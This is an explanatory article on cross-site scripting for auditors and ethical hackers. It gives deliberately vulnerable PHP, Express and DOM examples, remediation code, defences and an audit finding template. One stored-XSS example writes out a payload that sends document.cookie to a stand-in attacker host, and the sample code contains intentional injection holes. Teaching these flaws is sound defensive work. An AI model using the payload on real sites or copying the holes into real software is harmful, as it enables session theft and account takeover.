Cross-site scripting, abbreviated XSS, is one of the oldest and most persistent web vulnerabilities. It is also one of the most misunderstood, because developers often treat it as an input validation problem, while attackers treat it as an opportunity to own a browser and everything the victim can do in that browser. For security auditors and ethical hackers, XSS should be evaluated not just as a bug to report, but as a chain that includes user impact, detection gaps, and operational risk to the business. Below I explain the three main classes of XSS, show concise code examples for each, describe how those examples work, and finish with pragmatic defenses and testing guidance you can apply during audits or red team engagements.
Types of XSS, simply
- Reflected XSS: The server reflects attacker-controlled input immediately in an HTTP response, without proper encoding. The payload arrives in a crafted link or HTTP request, the server echoes it back, the browser executes it, and the attacker's code runs in the victim's context.
- Stored XSS: The application persists attacker input to a backend store, like a database, comment feed, or user profile. Later, other users load the page and receive the malicious script. Stored XSS scales because one injection can infect many victims.
- DOM-based XSS: All injection and execution happens inside client-side JavaScript, not on the server. The page's DOM APIs are used insecurely, for example by writing location.hash into innerHTML. If the script builds HTML from untrusted parts of the URL, the browser will run attacker code even though the server never injected it.
These types matter because they shape detection tactics, response playbooks, and how likely an issue is to become a production incident.
Minimal code examples and how they work
Below are small, purposely simple examples intended to illustrate mechanics for auditors and ethical hackers. They are not exploit tutorials, they are explanatory templates you can use to verify a finding or explain impact to developers.
1) Reflected XSS — simple PHP example
```php
<!-- search.php -->
<?php $q = $_GET['q'] ?? ''; ?>
<html>
<body>
  <form method="get" action="search.php">
    <input name="q" value="<?php echo $q; ?>" />
    <input type="submit" value="Search" />
  </form>
  <p>Results for: <?php echo $q; ?></p>
</body>
</html>
```
How it works: the q parameter from the URL is written into the page twice with no encoding. An attacker crafts a URL like https://example.com/search.php?q=<script>alert(1)</script> and convinces a victim to click it. When the victim's browser requests the URL, the server reflects the payload into the response, the browser parses the <script> tag, and executes it.
Why auditors care: reflected XSS is often used in phishing campaigns where a malicious link is the trigger. It's quick to find, and its risk depends on who you can social-engineer.
2) Stored XSS — Node.js/Express comment example
```javascript
// server.js (very simple)
const express = require('express');
const bodyParser = require('body-parser');
const app = express();

let comments = []; // naive in-memory store for demonstration

app.use(bodyParser.urlencoded({ extended: false }));

app.get('/comments', (req, res) => {
  let html = '<form method="post" action="/comment"><input name="text"><button>Post</button></form>';
  for (const c of comments) {
    html += `<div class="comment">${c}</div>`; // unsanitized output
  }
  res.send(html);
});

app.post('/comment', (req, res) => {
  comments.push(req.body.text);
  res.redirect('/comments');
});

app.listen(3000);
```
How it works: an attacker posts a comment containing <img src=x onerror=fetch('https://attacker/steal?c='+document.cookie)>. That string is stored in comments. When any user visits /comments, the server inserts the stored string directly into the HTML, the browser interprets it, and the onerror fires. Stored XSS is powerful because the attacker needs to inject only once, then spread payloads via social channels or rely on organic traffic.
Why auditors care: stored XSS can lead to account takeover, persistent session theft, or supply-chain style compromises if user-generated content is syndicated to many consumers or APIs.
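A minimal remediation sketch for the Express example above: encode stored comments for the HTML body context before interpolating them. The `escapeHtml` and `renderComments` names are illustrative, not part of the original code; in real code, prefer your framework's encoder over a hand-rolled one.

```javascript
// Encode the five characters that are significant in HTML body and
// quoted-attribute contexts. Illustrative only; use a vetted
// framework/library encoder in production.
function escapeHtml(untrusted) {
  return String(untrusted)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Build the comments page from the naive in-memory store.
// Stored payloads now render as inert text instead of executing.
function renderComments(comments) {
  let html = '<form method="post" action="/comment"><input name="text"><button>Post</button></form>';
  for (const c of comments) {
    html += `<div class="comment">${escapeHtml(c)}</div>`;
  }
  return html;
}
```

In the vulnerable handler, the fix amounts to replacing the inline string-building with `res.send(renderComments(comments))`.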
3) DOM-based XSS — client-side example
```html
<!-- index.html -->
<html>
<body>
  <div id="greeting"></div>
  <script>
    // insecure: writing the hash directly into the DOM
    document.getElementById('greeting').innerHTML = location.hash.substring(1);
  </script>
</body>
</html>
```
How it works: an attacker gives a victim a URL like https://example.com/index.html#<img src=x onerror=alert(1)>. The browser loads the page, client JavaScript reads location.hash and injects it into innerHTML without encoding. The payload runs purely inside the victim's browser, and crucially the server never sees the bad content.
Why auditors care: DOM XSS often slips past server-side scanners. It requires carefully reviewing client-side code, not just inputs or responses.
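A safe rewrite of the vulnerable line above swaps the HTML sink for a text sink. `greetingFromHash` is a hypothetical helper name; the key point is assigning via textContent, which treats the value as data rather than markup.

```javascript
// Hypothetical helper: pull the untrusted value out of the URL fragment.
// The return value is still untrusted -- it just never reaches an HTML parser.
function greetingFromHash(hash) {
  return decodeURIComponent(hash.replace(/^#/, ''));
}

// Safe sink: textContent renders the string literally, so a fragment like
// #<img src=x onerror=alert(1)> displays as text and never executes.
// document.getElementById('greeting').textContent = greetingFromHash(location.hash);
```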
Real-world impacts: user, brand, and audit perspective
- User impact: session theft, forced actions using the victim's privileges, keylogging inside forms, credential harvest via cloned login dialogs, malware download prompts when user action is required, or silent API calls to exfiltrate data.
- Brand impact: reputational damage from phishing campaigns that appear to come from the brand, legal exposure if personal data is exfiltrated, loss of customer trust and conversion rates, long tail of clean-up costs when cached pages or syndicated content carry malicious scripts.
- Audit perspective: XSS findings should be rated for both technical severity and business reach. A reflected XSS on an internal admin panel may be high for confidentiality and integrity but low for public exposure. A stored XSS in a high-traffic comments feed or a marketing CDN endpoint is high for both exposure and impact.
Pragmatic defenses: developer and responder checklists
For developers, prioritized fixes
- Output encoding by context: encode for HTML body, attribute, JavaScript, CSS, and URL contexts. Use the platform/framework encoding library, do not hand roll encoders.
- Sanitize dangerous HTML only if you must allow it: prefer safe subsets such as Markdown rendered server-side into trusted HTML, and use vetted libraries such as the OWASP Java HTML Sanitizer or DOMPurify for browser-side sanitization.
- Use secure cookie attributes: HttpOnly, Secure, and SameSite=Strict where feasible, and rotate session tokens after sensitive actions.
- Apply Content Security Policy (CSP) as defense in depth: use script-src with nonces or strict hashes, and enable report-uri or report-to for telemetry. CSP is not a replacement for encoding but it limits damage.
- Avoid innerHTML and similar sinks: prefer textContent, setAttribute, or safe DOM APIs when inserting untrusted data.
- Principle of least privilege for UIs: minimize where user inputs are rendered, and where possible, separate user-content rendering from code-execution surfaces.
- Logging and telemetry: log attempted script injection patterns, track CSP violation reports, and alert on spikes.
For incident responders and auditors
- Containment: identify affected endpoints, remove or neutralize stored payloads, rotate sessions and credentials if tokens may have been compromised.
- Forensic capture: preserve logs, capture payloads, and record known recipients to support disclosure and legal work.
- CSP report analysis: use CSP reports to find recurring payloads or blind spots in coverage.
- Customer notification plan: if compromise led to data exfiltration, follow the organization's incident response and legal guidance for timely notifications.
- Remediation verification: require both server-side fixes and client-side code review, plus re-scanning with authenticated crawlers and DAST tools.
Testing guidance for auditors and ethical hackers
- Check output contexts: test the same parameter rendered into HTML body, attribute, URL, and inline script. A parameter may be safe in one context and vulnerable in another.
- Test all user roles and content flows: stored XSS often shows up in profile fields, file names, image metadata, export features, and admin consoles.
- Inspect client-side templates: review framework templates, 3rd party widgets, single page app routing, and unsafe DOM APIs.
- Use authenticated scans plus manual verification: automated scanners find surface issues; manual tests uncover logic and chained problems.
- Proof of concept rules: when showing impact to stakeholders, use harmless PoC payloads like alert(1) or console.log('xss'), explain the exploitability path, and avoid publishing PoC payloads that would let attackers reproduce attacks easily at scale.
- Prioritize by reach: a stored XSS on the homepage or a syndicated API is worth more points than a reflected XSS on a single low-traffic endpoint.
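One way to apply the context-testing advice above is to inject a unique, inert marker per parameter and then grep responses for it, noting which contexts echo it and whether the special characters come back encoded. `makeProbe` is a hypothetical helper and the marker format is arbitrary.

```javascript
// Emit a unique, harmless marker so each injection point can be traced
// to the exact response context it lands in. The trailing '"<> characters
// reveal whether the application encodes output for that context.
let probeCounter = 0;
function makeProbe(param) {
  probeCounter += 1;
  return `xssprobe${probeCounter}-${param}-'"<>`;
}
```

During a test, search every response (HTML body, attributes, inline scripts, headers) for `xssprobe` and record, per hit, whether the quote and angle-bracket characters survived unencoded.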
Common developer mistakes and how to spot them
- Relying solely on input validation: attackers can craft inputs that pass validation and still break encoding rules in certain contexts.
- Sanitizer misconfiguration: allowing attributes like onload, onclick, or srcdoc in sanitized output, or trusting obsolete libraries.
- Overlooking third-party widgets: comment embeds, analytics scripts, or ad tech can introduce vectors or amplify an XSS.
- Assuming HTTPS equals safety: TLS protects transport, not execution in the browser.
Sample audit finding template (concise, actionable)
Title: Stored XSS in public comments, user profile, or feed
Affected: POST /comment, displayed at GET /comments
Impact: High, persistent, can exfiltrate session tokens and perform actions as users.
Evidence: stored payload string ... persisted, rendered without encoding in the .comment element.
Reproduction: safe PoC used: alert('XSS') inserted as a comment, then rendered on /comments.
Recommendation: encode output for HTML context, sanitize permitted HTML with a vetted library, apply HttpOnly for session cookie, deploy CSP with nonce-based script-src.
Priority: Critical for public high-traffic endpoints, Medium for low-traffic internal pages.
Final notes, practical posture
Treat XSS as a systems problem, not an input problem. The vulnerability sits at the intersection of developer practices, client-side behavior, and operational telemetry. For auditors, that means checking code, templates, storage, and delivery chains. For ethical hackers, that means proving impact responsibly, aligning with disclosure policies, and showing how a single string can turn a browser into an attacker-controlled agent. Fixing XSS improves confidentiality and integrity, and often reduces downstream phishing and social engineering risks, so it is high leverage work.
To learn more about XSS, follow the link to my website, build an XSS lab from the ground up, and practice a variety of XSS exploits: